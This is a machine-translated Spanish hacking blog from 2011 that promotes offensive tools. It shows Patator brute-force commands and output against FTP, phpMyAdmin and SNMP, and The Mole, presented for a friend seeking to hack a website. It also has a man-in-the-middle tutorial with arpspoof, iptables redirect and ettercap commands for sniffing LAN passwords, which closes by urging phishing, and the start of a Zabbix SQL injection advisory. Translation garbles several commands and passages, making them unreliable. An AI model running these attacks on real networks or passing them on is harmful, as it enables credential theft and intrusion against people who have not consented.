jueves, 29 de diciembre de 2011

Patator

Saludos mundo Libre.

Patator es un multi-propósito bruta forzador, con un diseño modular y un uso flexible. Básicamente, el autor se cansó de la utilización de Medusa, la Hidra, ncrack, módulos auxiliares metasploit, nmap scripts NSE y similares porque:

    
O bien no funcionan o no son fiables (falsos negativos en varias ocasiones en el pasado)
    
Son lentos (no multi-threaded o no pruebas de múltiples contraseñas en la misma conexión TCP)
    
Carecen de características muy útiles que sean fáciles de código en Python (por ejemplo, interactivo en tiempo de ejecución)
Básicamente, usted debe dar una oportunidad Patator una vez que se decepcione por Medusa, Hydra y otras herramientas de fuerza bruta y están a punto de código de script propio pequeño porque Patator le permitirá:

    
No escriba el mismo código una y otra vez
    
Ejecutar múltiples subprocesos
    
Beneficiarse de las características útiles, tales como los comandos de tiempo de ejecución interactiva, el registro de respuesta, etc
Actualmente soporta los siguientes módulos:

    
ftp_login: fuerza bruta FTP
    
ssh_login: fuerza bruta SSH
    
telnet_login: fuerza bruta Telnet
    
smtp_login: fuerza bruta SMTP
    
smtp_vrfy: Enumerar los usuarios válidos con el comando SMTP VRFY
    
smtp_rcpt: Enumerar los usuarios válidos utilizando el comando RCPT TO SMTP
    
http_fuzz: fuerza bruta HTTP / HTTPS
    
pop_passd: fuerza bruta poppassd (no POP3)
    
ldap_login: fuerza bruta LDAP
    
smb_login: fuerza bruta SMB
    
mssql_login: fuerza bruta MSSQL
    
oracle_login: la fuerza bruta de Oracle
    
mysql_login: fuerza bruta MySQL
    
pgsql_login: fuerza bruta PostgreSQL
    
vnc_login: fuerza bruta VNC
    
dns_forward: Delantero subdominios de búsqueda
    
dns_reverse: Reverse subredes de búsqueda
    
snmp_login: fuerza bruta SNMPv1 / 2 y SNMPv3
    
unzip_pass: la fuerza bruta la contraseña de archivos ZIP cifrados
    
keystore_pass: la fuerza bruta la contraseña de almacén de archivos de Java
El nombre de "Patator" proviene de este clip entrevista tv - patator
Patator NO es un script-kiddie amistoso, por favor, lea el README dentro patator.py antes de informar / queja / preguntándome cómo utilizar esta herramienta ..



  • FTP : Enumerate valid logins on a too verbose server
 $ patator.py ftp_login host=10.0.0.1 user=FILE0 password=qsdf 0=logins.txt -x ignore,reset,retry:code=500 -x reset:code=230 -x ignore:mesg='Login incorrect.'
 22:27:29 patator    INFO - Starting Patator v0.2
 22:27:29 patator    INFO - ---------------------------------------------------------------
 22:27:29 patator    INFO - code & size     | candidate                   |   num | mesg ..
 22:27:29 patator    INFO - ---------------------------------------------------------------
 22:27:30 patator    INFO - 530 18          | root                        |     1 | Permission denied.
 22:27:31 patator    INFO - 230 17          | ftp                         |    13 | Login successful.
 22:27:34 patator    INFO - 530 18          | admin                       |    23 | Permission denied.
 22:27:34 patator    INFO - 530 18          | oracle                      |    31 | Permission denied.
 22:28:02 patator    INFO - 530 18          | test                        |   179 | Permission denied.
 22:28:21 patator    INFO - 230 17          | anonymous                   |   283 | Login successful.
 22:28:26 patator    INFO - 530 18          | ftpuser                     |   357 | Permission denied.
 22:28:41 patator    INFO - 530 18          | nobody                      |   402 | Permission denied.
 ...
 

  • HTTP : Brute-force phpMyAdmin logon
 $ http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST body='pma_username=COMBO00&pma_password=COMBO01&server=1&lang=en' 0=combos.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf
 10:55:50 patator    INFO - Starting Patator v0.2
 10:55:50 patator    INFO - ---------------------------------------------------------------
 10:55:50 patator    INFO - code & size     | candidate                   |   num | mesg ..
 10:55:50 patator    INFO - ---------------------------------------------------------------
 10:55:50 patator    INFO - 200 8209:7075   | root:                       |    22 | HTTP/1.1 200 OK
 10:55:51 patator    INFO - 200 3838:2566   | root:p@ssw0rd               |    44 | HTTP/1.1 200 OK
 ^C
 10:55:52 patator    INFO - Hits/Done/Size/Fail: 2/125/2342/0, Avg: 47 r/s, Time: 0h 0m 2s
 10:55:52 patator    INFO - To resume execution, pass --resume 12,13,12,13,12,12,13,13,13,12
 
 $ cat /tmp/qsdf/22_200_8209\:7075.txt
 ...
 
Login without a password is forbidden by configuration (see AllowNoPassword)

  • SNMPv3 : Find valid usernames
 $ snmp_login host=10.0.0.1 version=3 user=FILE0 0=logins.txt -x ignore:mesg=unknownUserName
 17:51:06 patator    INFO - Starting Patator v0.2
 17:51:06 patator    INFO - ---------------------------------------------------------------
 17:51:06 patator    INFO - code & size     | candidate                   |   num | mesg ..
 17:51:06 patator    INFO - ---------------------------------------------------------------
 17:51:11 patator    INFO - 0-0 11          | robert                      |    55 | wrongDigest
 17:51:12 patator    INFO - Progress:  20% (70/345) | Speed: 10 r/s | ETC: 17:51:38 (00:00:26 remaining)
 17:51:33 patator    INFO - 0-0 11          | myuser                      |   311 | wrongDigest
 17:51:36 patator    INFO - Hits/Done/Size/Fail: 2/345/345/0, Avg: 11 r/s, Time: 0h 0m 30s
 
  • SNMPv3 : Find valid passwords
 $ snmp_login host=10.0.0.1 version=3 user=robert auth_key=FILE0 0=passwords_8+.txt -x ignore:mesg=wrongDigest
 17:52:15 patator    INFO - Starting Patator v0.2
 17:52:15 patator    INFO - ---------------------------------------------------------------
 17:52:15 patator    INFO - code & size     | candidate                   |   num | mesg ..
 17:52:15 patator    INFO - ---------------------------------------------------------------
 17:52:16 patator    INFO - 0-0 69          | password123                 |    16 | Linux thug 2.6.36-gentoo #5 SMP Fri Aug 12 14:49:51 CEST 2011 i686
 17:52:17 patator    INFO - Hits/Done/Size/Fail: 1/50/50/0, Avg: 38 r/s, Time: 0h 0m 1s
 

  • DNS : Forward lookup
 $ dns_forward domain=FILE0.hsc.fr 0=names.txt -x ignore:code=3
 10:53:20 patator    INFO - Starting Patator v0.2
 10:53:20 patator    INFO - ---------------------------------------------------------------
 10:53:20 patator    INFO - code & size     | candidate                   |   num | mesg ..
 10:53:20 patator    INFO - ---------------------------------------------------------------
 10:53:20 patator    INFO - 0 35            | www                         |     4 | NOERROR www.hsc.fr / 217.174.211.25
 10:53:20 patator    INFO - 0 51            | mail                        |    32 | NOERROR itesec.hsc.fr / 192.70.106.33 / mail.hsc.fr
 10:53:21 patator    INFO - 0 8             | test                        |    54 | NOERROR 
 10:53:21 patator    INFO - 0 34            | wap                         |    66 | NOERROR wap.hsc.fr / 192.70.106.33
 10:53:21 patator    INFO - 0 38            | webmail                     |    62 | NOERROR webmail.hsc.fr / 192.70.106.95
 10:53:21 patator    INFO - 0 51            | news                        |   114 | NOERROR itesec.hsc.fr / 192.70.106.33 / news.hsc.fr
 10:53:22 patator    INFO - 0 61            | mailhost                    |   137 | NOERROR mailhost.hsc.fr / 2001:7a8:1155:2::abcd 192.70.106.33
 10:53:22 patator    INFO - 0 55            | extranet                    |   131 | NOERROR itesec.hsc.fr / 192.70.106.33 / extranet.hsc.fr
 Hostmap ------------------------------------------
                    mailhost.hsc.fr 2001:7a8:1155:2::abcd
                    mailhost.hsc.fr 192.70.106.33
                         wap.hsc.fr 192.70.106.33
                      itesec.hsc.fr 192.70.106.33
                    extranet.hsc.fr .
                        mail.hsc.fr .
                        news.hsc.fr .
                     webmail.hsc.fr 192.70.106.95
                         www.hsc.fr 217.174.211.25
 Domains ------------------------------------------
                             hsc.fr 6
 Networks -----------------------------------------
                             2001:7a8:1155:2::abcd
                                      192.70.106.x
                                    217.174.211.25
 10:53:34 patator    INFO - Hits/Done/Size/Fail: 8/300/300/0, Avg: 21 r/s, Time: 0h 0m 14s
 
  • DNS : Reverse lookup two netblocks owned by Google
 $ dns_reverse host=NET0 0=216.239.32.0-216.239.47.255,8.8.8.0/24 -x ignore:code=3 -x ignore:fgrep!=google.com -x ignore:fgrep=216-239-
 10:52:17 patator    INFO - Starting Patator v0.2
 10:52:17 patator    INFO - ---------------------------------------------------------------
 10:52:17 patator    INFO - code & size     | candidate                   |   num | mesg ..
 10:52:17 patator    INFO - ---------------------------------------------------------------
 10:52:18 patator    INFO - 0 22            | 216.239.32.10               |    11 | NOERROR ns1.google.com
 10:52:18 patator    INFO - 0 21            | 216.239.32.11               |    12 | NOERROR ns.google.com
 10:52:18 patator    INFO - 0 24            | 216.239.32.15               |    16 | NOERROR time1.google.com
 10:52:18 patator    INFO - 0 27            | 216.239.33.17               |   274 | NOERROR smtp-out.google.com
 10:52:18 patator    INFO - 0 23            | 216.239.33.12               |   269 | NOERROR dns1.google.com
 10:52:18 patator    INFO - 0 24            | 216.239.33.5                |   262 | NOERROR proxy.google.com
 10:52:18 patator    INFO - 0 28            | 216.239.33.18               |   275 | NOERROR smtp-out3.google.com
 10:52:18 patator    INFO - 0 24            | 216.239.33.28               |   285 | NOERROR smtp8.google.com
 10:52:18 patator    INFO - 0 26            | 216.239.33.20               |   277 | NOERROR esc-out.google.com
 10:52:18 patator    INFO - 0 27            | 216.239.33.22               |   279 | NOERROR transfer.google.com
 10:52:19 patator    INFO - 0 22            | 216.239.34.10               |   523 | NOERROR ns2.google.com
 10:52:19 patator    INFO - 0 24            | 216.239.34.15               |   528 | NOERROR time2.google.com
 ^C
 Hostmap ------------------------------------------
                     ns1.google.com 216.239.32.10
                      ns.google.com 216.239.32.11
                   time1.google.com 216.239.32.15
                   proxy.google.com 216.239.33.5
                    dns1.google.com 216.239.33.12
                smtp-out.google.com 216.239.33.17
               smtp-out3.google.com 216.239.33.18
                 esc-out.google.com 216.239.33.20
                transfer.google.com 216.239.33.22
                   smtp8.google.com 216.239.33.28
                     ns2.google.com 216.239.34.10
                   time2.google.com 216.239.34.15
 Domains ------------------------------------------
                         google.com 12
 Networks -----------------------------------------
                                      216.239.32.x
                                      216.239.33.x
                                      216.239.34.x
 10:52:20 patator    INFO - Hits/Done/Size/Fail: 12/664/4352/0, Avg: 238 r/s, Time: 0h 0m 2s
 10:52:20 patator    INFO - To resume execution, pass --resume 67,74,68,66,63,69,54,64,69,70
 

  • ZIP : Crack a password-protected ZIP file (older pkzip encryption not supported in JtR)
 $ unzip_pass zipfile=challenge1.zip password=FILE0 0=rockyou.dic -x ignore:code!=0 
 10:54:29 patator    INFO - Starting Patator v0.2
 10:54:29 patator    INFO - ---------------------------------------------------------------
 10:54:29 patator    INFO - code & size     | candidate                   |   num | mesg ..
 10:54:29 patator    INFO - ---------------------------------------------------------------
 10:54:30 patator    INFO - 0 82            | love                        |   387 | 0 [82] No errors detected in compressed data of challenge1.zip.
 ^C
 10:54:31 patator    INFO - Hits/Done/Size/Fail: 1/1589/5000/0, Avg: 699 r/s, Time: 0h 0m 2s
 10:54:31 patator    INFO - To resume execution, pass --resume 166,164,165,166,155,158,148,158,155,154 
 
Fuente: http://code.google.com/p/patator/
 
Traducion: Dellcom1@.
 
Saludos Mundo Libre. 

jueves, 22 de diciembre de 2011

Social Engineering Vulnerability Evaluation and Recommendation Project

Saludos Mundo Libre.

Para todos aquellos que quieres aprender :

Ingeniería social, evaluación de la vulnerabilidad y Proyecto de Recomendación
 

¿Desea aprender Pruebas de Penetración

La ingeniería social ha sido de alrededor de decenas de miles de años, así que es hora de que nos acercamos al tema de una manera profesional. La Evaluación de Ingeniería de vulnerabilidad social y la Recomendación (Sever) del proyecto es una manera de ayudar a los probadores de penetración cada vez más consistente. También se pretende que sea la mejor manera de enseñar a los novatos sobre los conceptos de ingeniería social.

De la destilación de miles de páginas de la teoría en una forma simple el proyecto SEVER espera:

     Proporcionan el medio más rápido de los novatos de formación sobre los complejos conceptos de ingeniería social.
    

Proporcionar pruebas de penetración con una metodología que minimiza su esfuerzo al tiempo que aumenta sus posibilidades de éxito.

Usted va a comenzar por la definición de requisitos, a continuación, generar soluciones, y luego refinar sus soluciones a través de varias fases. Cada fase aumenta en detalle, lo que permite identificar 'show tapones "tan pronto como sea posible. Esto le ayudará a evitar la pérdida de tiempo trabajando en un plan que no va a tener éxito. Si una idea se hace a través de todo el proceso y todavía te sientes bien por ello, entonces debería haber una posibilidad muy alta de éxito.

El mejor formato para este contenido sería una forma electrónica con un montón de notas sensibles al contexto. Pero ya que actualmente no existe una forma eficaz y portátil de lograr que se decidió dividir el contenido en dos archivos PDF - la hoja de cortar y las instrucciones de Sever. Ir a través de estas instrucciones mientras se llena el formulario hasta que haya una comprensión cabal de cómo se forman las obras. Si haces trampa y tratar de hacer uno delante del otro (u omitir las instrucciones en total) se perderá lo que hará falta mucho más probable.


Fuente: http://www.darknet.org.uk/

Descarga Archivo: http://www.darknet.org.uk/


Traduccion: Dellcom1a


Saludos Mundo Libre.

miércoles, 7 de diciembre de 2011

Transport Layer Security (TLS)

Saludos Mundo Libre.

Transport Layer Security (TLS), comúnmente llamado SSL, es uno de los protocolos más utilizados para asegurar las comunicaciones de red. Como los costos de la seguridad y la caída de los usuarios y las expectativas de privacidad de las empresas que se incremento el despliegue de más ampliamente cada año. Los ataques contra el sistema de CA, las fallas de aplicación SSL y el envejecimiento de las versiones del protocolo han acaparado los titulares de prensa, llamando la atención a las configuraciones débiles, y la necesidad de evitarlos. Además, una mala configuración del servidor siempre ha aumentado considerablemente la sobrecarga causada por SSL, retrasando la transición a la seguridad mejora de las comunicaciones.

Para ayudar a mejorar las configuraciones del sistema, iSEC está lanzando el software libre "SSLyze" de la herramienta. Ellos han encontrado esta útil herramienta para el análisis de la configuración de los servidores SSL y para la identificación de errores de configuración, tales como el uso de versiones obsoletas del protocolo, la debilidad de los algoritmos hash en las cadenas de la confianza, la renegociación de la inseguridad, y la configuración de la sesión de reanudación.

SSLyze es una aplicación independiente python que busca errores de configuración SSL clásico, mientras que proporciona al usuario avanzado la posibilidad de personalizar la aplicación a través de una interfaz simple plugin.

características

     Prueba de renegociación inseguros
     La exploración de sistemas de cifrado de la fuerza débil
     Comprobación de SSLv2, SSLv3 y versiones TLSv1
     Certificado de servidor de información de descarga y validación básica
     Capacidades sesión de reanudación y la medición real de reanudación de la tasa
     Soporte para la autenticación de certificado de cliente
     Exploración simultánea de múltiples servidores, versiones y cifras

Por ejemplo, puede ayudar a SSLyze usuario identificar las configuraciones del servidor vulnerable a la recientemente liberada del THC SSL ataque DOS comprobando el apoyo del servidor de cliente inició la renegociación. Para más información sobre las pruebas de las renegociaciones iniciadas por el cliente, se puede leer aquí.




Fuente: http://code.google.com/p/sslyze/

Descarga: http://code.google.com/p/sslyze/


Traduccion: Dellcom1@.


Saludos Mundo Libre.

jueves, 1 de diciembre de 2011

The Mole SQL Injection

Saludos Mundo Libre.

Hace un par de dias he recibido una MSN para el hackeo de una web y de ahi parto con este articulo para mi amigo hacker.

The Mole es una herramienta de inyección SQL automático explotación. Sólo mediante una URL vulnerable y una cadena válida en el sitio es capaz de detectar la inyección y la explotan, ya sea mediante la técnica de unión o de una técnica de consulta en función booleana.
características

     Apoyo a las inyecciones usando MySQL, SQL Server, PostgreSQL y Oracle.
     Interfaz de línea de comandos. Diferentes comandos de disparo diferentes acciones.
     Finalización automática de los comandos, argumentos de comandos y los nombres de base de datos, tabla y las columnas.
     Soporte para filtros de consulta, con el fin de evitar que determinadas IP / IDS normas el uso de filtros genéricos, y la posibilidad de crear otras nuevas con facilidad.
     Desarrollado en Python 3.

 Instalación de The Mole
binarios de Windows
dependencias

ninguno
Proceso de configuración

     Descomprimir el archivo. Ahora tendrá una carpeta con el nombre themole- con varios archivos en su interior.
     Ejecutar el archivo mole.exe dentro de la carpeta.

En este momento sólo hay una versión binaria de 32 bits de Windows. Pronto comenzará a dar la liberación de 64 bits.
Fuentes para los no-Windows OS
dependencias

     Python 3. Se puede descargar desde el sitio oficial aquí o hacerlo a través de su gestor de paquetes.
     lxml. Se puede descargar desde su sitio aquí oa través del gestor de paquetes que pueda tener. Para instalarlo desde las fuentes, en primer lugar usted necesita la python3 encabezados desarrolladores se puede descargar la de los administradores de su paquete (python3-dev en Ubuntu, por ejemplo). Luego, descomprimir los fuentes y dentro de esa carpeta:

python3 setup.py construir

# Python3 setup.py install

     readline. Si está ejecutando un sistema Unix, entonces seguramente lo han instalado.

Proceso de configuración

Una vez que las dependencias se han instalado:

     Descomprimir el archivo de fuentes. Usted puede hacer esto con alquitrán xfz . Ahora tendrá una carpeta con el nombre themole- con las fuentes en su interior.
     Ejecutar con el archivo python3 mole.py hay algunos argumentos que se pueden dar en el programa, lea el archivo README para aprender sobre ellos.

Fuentes para Windows
dependencias

     Python 3. Se puede descargar desde el sitio oficial aquí o hacerlo a través de su gestor de paquetes.
     lxml. Usted puede descargar el código fuente de su sitio de aquí o se puede descargar un instalador de PyPI

Proceso de configuración

     Descomprimir el archivo. Ahora tendrá una carpeta con el nombre themole- con varios archivos en su interior.
     Ejecutar mole.py con el intérprete de Python 3.

Instalación lxml en GNU / Linux
repositorios

La manera más común para instalarlo es buscar en los repositorios de tu distribución.
Por ejemplo, en Ubuntu el lxml para python3 está disponible en los repositorios de 11,04 hacia arriba
con el nombre python3-lxml.
Instalación de fuentes

En el caso, los depósitos no tienen la biblioteca a disposición, no depósitos o lo que desea es
instalarlo desde las fuentes, antes de que nos explique cómo hacerlo.
requisitos

Antes de iniciar la instalación es necesario tener las siguientes cosas:
Python 3

Bastante obvio por qué, pero sigue siendo un requisito. Siga las instrucciones que se dan con la
fuentes oficiales.
Python cabeceras de desarrollo

Si usted ha elegido para instalar python3 de sus fuentes, es que ya tienen el desarrollo
cabeceras instaladas. Si no, usted debe descargar desde el repositorio. en Ubuntu
que se puede encontrar bajo el paquete python3-dev
libxml

lxml requiere la unión de python libxml. Se recomienda su instalación a través de los repositorios
en caso de tener. Para instalarlo desde las fuentes de ir a la página oficial
y seguir sus instrucciones (para ello será necesario instalar más dependencias).
Proceso de instalación

     Extracto lxml código fuente:. $ Tar xfz lxml- tgz
     Ve a la carpeta extraída: $ cd lxml-
     Compilar lxml con python3:
     $ Python3 setup.py construir
     Ahora bien, si todo ha ido bien (como era de esperar), como raíz de la instalación de la biblioteca lxml (de nuevo, utilizando python3):
     # Python3 setup.py install

Es muy importante que utilice python3 tanto, compilar e instalar lxml, si utiliza python2 la biblioteca se encuentra dañado o no cuando se utiliza en La Mole
.

Una exelente Herramienta.
Fuente:http://themole.sourceforge.net/

Descarga:http://themole.sourceforge.net/?q=downloads

Traduccion: Dellcom1@.

Saludos Mundo Libre.

martes, 29 de noviembre de 2011

Twitter cucharadas de seguridad móvil

Saludos Mundo Libre.

Twitter cucharadas de seguridad móvil a desarrolladores de sistemas Susurro 
Software de Sistemas de Susurro ofrece encriptación completa del disco y software de seguridad para los teléfonos Android
Twitter puede ser la planificación para aumentar sus opciones de seguridad móvil con la adquisición de Sistemas de Whisper, una empresa que ofrece productos de seguridad para los teléfonos Android.
Ofertas de Sistemas de susurro 'incluyen WhisperCore, un software que permite el cifrado de disco completo, así como herramientas de gestión para teléfonos Android. Es gratis para los usuarios individuales mientras que los clientes de la empresa paga por el software.
Industria de la Seguridad ALL-STARS: Incluye Moxie Marlinspike Whisper
Otros sistemas de Susurro productos incluyen el cifrado de texto, encriptación de voz, software de cortafuegos y copias de seguridad cifradas.

En un post de blog acerca de la adquisición, los sistemas de susurro no dice mucho acerca de lo que Twitter podría estar planeando hacer con la tecnología. "Ahora que estamos uniendo en Twitter, tenemos muchas ganas de llevar nuestra tecnología y experiencia en productos de Twitter y servicios", escribió la empresa en su blog.
Dijo que Susurro de software de Sistemas seguirá estando disponible, pero que durante un período transitorio de la empresa se llevará a los productos y servicios en línea. En un foro en la página web Susurro Systems, las personas aparentemente sin darse cuenta de la adquisición ya se preguntaba por qué no pueden descargar los productos.
Twitter no respondió a una solicitud de comentarios sobre sus planes para las nuevas tecnologías.
WhisperCore tiene una serie de características diseñadas para compensar las deficiencias de seguridad en Android. Por ejemplo, los usuarios WhisperCore selectiva puede revocar los permisos que una aplicación solicita al tiempo que permite al usuario seguir utilizando la aplicación.
El programa también incluye una característica dirigida a frustrar a alguien que ha robado un teléfono de determinar el código de desbloqueo del teléfono sobre la base de manchas dedo en la pantalla. Algunos teléfonos Android mostrar las filas de puntos y un usuario desbloquea el teléfono arrastrando el dedo por los puntos determinados en un patrón establecido. Un atacante podría ser capaz de recrear el patrón mediante el examen de las manchas dedo en la pantalla. Muestra WhisperCore desbloquear números en una columna, por lo que un atacante no conoce el orden en que el usuario pulsa los números para desbloquear el teléfono.
A principios de este año sistemas de Susurro lanzado un kit de desarrollo de software para que los desarrolladores pueden empezar a construir algunas de las características WhisperCore en sus aplicaciones.
Pocas empresas están haciendo otras cifrado de disco completo para Android, aunque hay muchas otras empresas de tomar otros métodos para conseguir los teléfonos Android. Empresas como la tecnología y 3LM buena oferta de servicios móviles de seguridad para las empresas. Además, los productos de gestión de dispositivos móviles de empresas como Sybase, BoxTone, Zenprise, hierro móvil y Fiberlink que los administradores de TI establecer políticas básicas como el requisito de contraseña y borrado remoto, y ofrecen capacidades de seguridad adicionales.
Nancy Gohring cubre los teléfonos móviles y la computación en nube para el Servicio de Noticias IDG. Nancy sigue en Twitter en @ idgnancy. E-mail la dirección de Nancy es Nancy_Gohring@idg.com
El IDG News Service es un afiliado de la Red Mundial.




Por Nancy Gohring, IDG News Service


Fuente:http://www.networkworld.com/news/2011/112811-twitter-scoops-up-mobile-security-253493.html?source=nww_rss


Traduccion: Dellcom1@.


Saludos Mundo Libre.

Monkey in the Middle

Saludos Mundo libre.

He leido un articulo exelente en Xtremeroot por supuesto y quiero compartirlo con todos ustedes:

El articulo trata de  Man-in-the-Middle, El texto es el siguiente.

De todos modos, probablemente debería tratar de explicar qué es lo que vamos a estar haciendo en primer lugar. Pero primero, para aquellos de ustedes que se ejecutan en Linux, esto es lo que usted necesita.

    DSniff
    Twisted-Web
    SSL-Strip
    Ettercap
    * Nix OS con parches para el kernel, etc
    Python 2.5 o superior.


Es opcional para instalar sslstrip puesto que sólo se puede ejecutar directamente a través de la línea de comandos. Es completamente de ti mismo.

Lo más probable es el mejor sistema operativo Linux para todo este tipo de cosas es, de hecho, Back Track, pero yo prefiero hacer de todo en lo que estoy corriendo y ya que mi kernel de Ubuntu es parcheado, modded y ha sido a través de un guardarropa completamente nuevo de la núcleo estándar, te voy a mostrar lo que estoy haciendo con Ubuntu. Track Back de hecho, pre-instalación de todas estas cosas, pero para los usuarios que no saben cómo conseguirlos:

sudo aptitude install dsniff python-twisted-web ettercap

También voy a adjuntar los archivos de SSL-Strip en la parte inferior del tutorial.

Y parchear el kernel y / o conductores son a la vez hasta que usted haga.

Cita
ARP significa Address Resolution Protocol y que permite a la red para traducir las direcciones IP en direcciones MAC. Básicamente, ARP funciona así: Cuando un host con IP en una red local está tratando de contactar a otro que necesita la dirección MAC (aka: la dirección de hardware) de la máquina que está tratando de ponerse en contacto. Primero busca en él es la caché ARP (para ver la caché ARP en el tipo de ventanas en el "arp â €" a "en la línea de comandos) para ver si ya tiene la dirección MAC, pero si no se difunde a una solicitud de ARP preguntando" Yo, que tiene esta dirección IP que estoy buscando? " Si el host que tiene esa dirección IP escucha la consulta ARP, responderá con su propia dirección MAC y una conversación puede comenzar a utilizar IP. En las redes de bus común como Ethernet utilizando un hub o 801.11b todo el tráfico puede ser visto por todos los ejércitos, que es NIC están en modo promiscuo, pero las cosas son un poco diferentes en redes conmutadas. Un interruptor se ve en los datos enviados a él y trata de sólo envía paquetes a su destinatario basado en direcciones MAC. Las redes conmutadas son más seguros y ayudar a acelerar la red sólo el envío de paquetes, donde tienen que ir. Hay maneras alrededor de los interruptores sin embargo:). Usando un programa como arpspoof, Ettercap nos puede "mentir" a otras máquinas en la red de área local y decirles que tenemos la IP que están buscando, así canalizar el tráfico a través de nosotros.

Voy a admitir ahora, después de haber escrito una explicación amplia de seguridad antes de lo que se ve arriba, pensé que era demasiado confuso para la gente a seguir, así que sólo una mirada y encontré éste, y pensamos que va a hacer. Por lo tanto, la alabanza va a quien escribió esa frase, supongo. : (


Lo primero que debe hacer es asegurarse de que el reenvío de paquetes está activada, de otra forma nuestra máquina va a caer todo el tráfico entre los hosts que están tratando de rastrear, causando una denegación de servicio. Algunas de las herramientas voy a mostrar lo haga por usted de forma automática, pero para estar seguro de que usted lo desea, puede hacerlo usted mismo. Utilice el siguiente comando:

[B] Usted debe estar en privilegios elevados antes de hacer nada de esto: (sudo-i)

echo 1> / proc/sys/net/ipv4/ip_forward



Ahora que nuestra máquina pequeña y útil enviará el tráfico que puede comenzar Arpspoofing. Supongamos que quiero oler todo el tráfico entre un host y gateway para que pueda ver el tráfico que se envía a Internet. Para conseguir tráfico en ambas direcciones que yo haría los siguientes comandos:


Para configurar iptables para interceptar las peticiones HTTP (como root):

iptables-t nat-A PREROUTING-p tcp - destination-port 80-j REDIRECT - to-port


arpspoof-i-t &> / dev / null



Una vez hecho esto, verá líneas similares a esta por debajo. Yo sé que mi IP está aquí, pero por alguna de las personas que no saben ya, estas son las direcciones IP internas y no externas.

0:16 Visto: e3: ser: 49: f8 FF: FF: FF: FF: FF: FF 0806 42: 192.168.1.254 respuesta ARP es-en 0:16 Visto: e3: ser: 49: f8
0:16 Visto: e3: ser: 49: f8 FF: FF: FF: FF: FF: FF 0806 42: 192.168.1.254 respuesta ARP es-en 0:16 Visto: e3: ser: 49: f8
0:16 Visto: e3: ser: 49: f8 FF: FF: FF: FF: FF: FF 0806 42: 192.168.1.254 respuesta ARP es-en 0:16 Visto: e3: ser: 49: f8
0:16 Visto: e3: ser: 49: f8 FF: FF: FF: FF: FF: FF 0806 42: 192.168.1.254 respuesta ARP es-en 0:16 Visto: e3: ser: 49: f8
0:16 Visto: e3: ser: 49: f8 FF: FF: FF: FF: FF: FF 0806 42: 192.168.1.254 respuesta ARP es-en 0:16 Visto: e3: ser: 49: f8
0:16 Visto: e3: ser: 49: f8 FF: FF: FF: FF: FF: FF 0806 42: 192.168.1.254 respuesta ARP es-en 0:16 Visto: e3: ser: 49: f8


Una vez que esto está funcionando, usted consiguió la parodia ARP configurar y solo tienes que dejar que la ejecución de una apertura de una nueva terminal / consola / línea de comandos / shell / tab / lo que sea.

arpspoof-t 192.168.1.2 192.168.1.1 y> / dev / null


El "&> / dev / nul" parte está ahí para que sea más fácil de gestionar desde un terminal, sino que lo desea, puede omitir para fines de depuración. Ahora podemos usar cualquier paquete que queremos para olfatear la conexión. Para empezar le recomiendo usar el dsniff sniffer que viene junto con arpspoof para olfatear las contraseñas de texto plano. Para ver todo tipo de tráfico que se lo recomendaría tcpdump o Ethereal. Cuando esté listo para dejar de emitir arpspoofing el siguiente comando.

killall arpspoof

Esto debería matar a las dos instancias de arpspoof comenzó arriba.


Una vez que hecho lo anterior - no matar! - Usted debe ver a montones y montones de líneas de "basura". No haga caso de ella porque es normal. Sólo tiene que abrir una nueva terminal / consola / pestaña.


Yo la utilizo en modo no interactivo pero por defecto, tiene una interfaz ncurses. Aquí está un ejemplo rápido de cómo huelen las contraseñas en modo no-interactivo entre dos máquinas.


ettercap-NAC 192.168.1.1 192.168.1.2



La "N" opción hace que no sea interactivo, la "a" la opción que dice que arppoison y la "C" le dice a analizar las contraseñas y nombres de usuario. Ettercap y Dsniff son una gran herramienta para olfatear las contraseñas de los protocolos que les envíe texto plano (telnet, SMTP, http, etc) Una cosa agradable sobre Ettercap es que va a algún proxy de conexiones como SSL y le permitirá rastrear el tráfico que suele ser encriptados , la víctima recibe un mensaje de advertencia acerca del certificado, pero mucha gente simplemente haga clic en el pasado tales cosas sin leerlos. Si desea utilizar Ettercap a sólo arpspoof para que pueda utilizar otra herramienta de sniffing con tan sólo mirar en la página del manual de la "J" opción.


Tarde o temprano, te has cogido algunas contraseñas por inhalación de la LAN. Hacerlo donde y cuando usted quiere para un método de phishing más "interactivo y estructurado". :)

Happy Hacking.


Fuente: http://www.xtremeroot.net/Offensive/index.php?showtopic=14138

Traduccion: Dellcom1@.

Saludos Mundo Libre.

lunes, 28 de noviembre de 2011

VoIP Hopper

Saludos Mundo Libre

VoIP Hopper
 
Información general
 
VoIP Hopper es una herramienta de licencia GPLv3 la seguridad, escrito en C, que rápidamente se ejecuta un salto de VLAN test de seguridad. VoIP Hopper es una infraestructura de seguridad de VoIP herramienta de prueba, sino también una herramienta que puede ser utilizado para probar la seguridad (en) de las VLAN.

VoIP Hopper 2.0 está disponible! Esta es la misma versión de VoIP Hopper que se demostró en vivo en DefCon 19 conferencias en la presentación, "VoIP Hopping del hotel: Atacar a las Joyas de la Corona a través de VoIP". Algunas nuevas y emocionantes características de VoIP Hopper son los siguientes:

     Nueva "Evaluación" modo: Interactive, la interfaz de menú de órdenes, mejora la capacidad de salto de VLAN en Pentesting cuando el analista de seguridad está trabajando en contra de una infraestructura de red desconocido

     Nuevo descubrimiento de los métodos de VLAN (802.1Q ARP, LLDP-MED)

     LLDP-MED suplantación de identidad y el apoyo sniffing

     Puede pasar por alto VoIP subredes VLAN que han DHCP deshabilitado, y falsificar la dirección IP y la dirección MAC de un teléfono mediante el establecimiento de una dirección IP estática





Lo Podemos descargar desde : http://sourceforge.net/projects/voiphopper/files/

Fuente: http://voiphopper.sourceforge.net/index.html

Traduccion: Dellcom1@


Saludos Mundo Libre.

jueves, 24 de noviembre de 2011

Zabbix 1.8.4 Inyección SQL

Saludos Mundo Libre.

Vulnerabilidad:

Zabbix es una empresa de clase de código abierto distribuido solución de monitorización.Zabbix es un software que controla varios parámetros de una red y ella salud y la integridad de los servidores. Configurado correctamente, Zabbix puede desempeñar unpapel importante en la supervisión de la infraestructura de TI. Esto es igualmente cierto paraorganizaciones pequeñas, con unos pocos servidores y para las grandes empresas con unmultitud de servidores.
 
III. INTRODUCCIÓN-------------------------Zabbix la versión 1.8.3 y 1.8.4 tiene una vulnerabilidad en la que popup.phppermite a un atacante realizar un ataque de inyección SQL. Sin autenticaciónnecesaria.
 
IV. El código vulnerable-------------------------
 
Archivo línea popup.php 1513:

 
'SELECT DISTINCT hostid, anfitrión $ sql =.
    
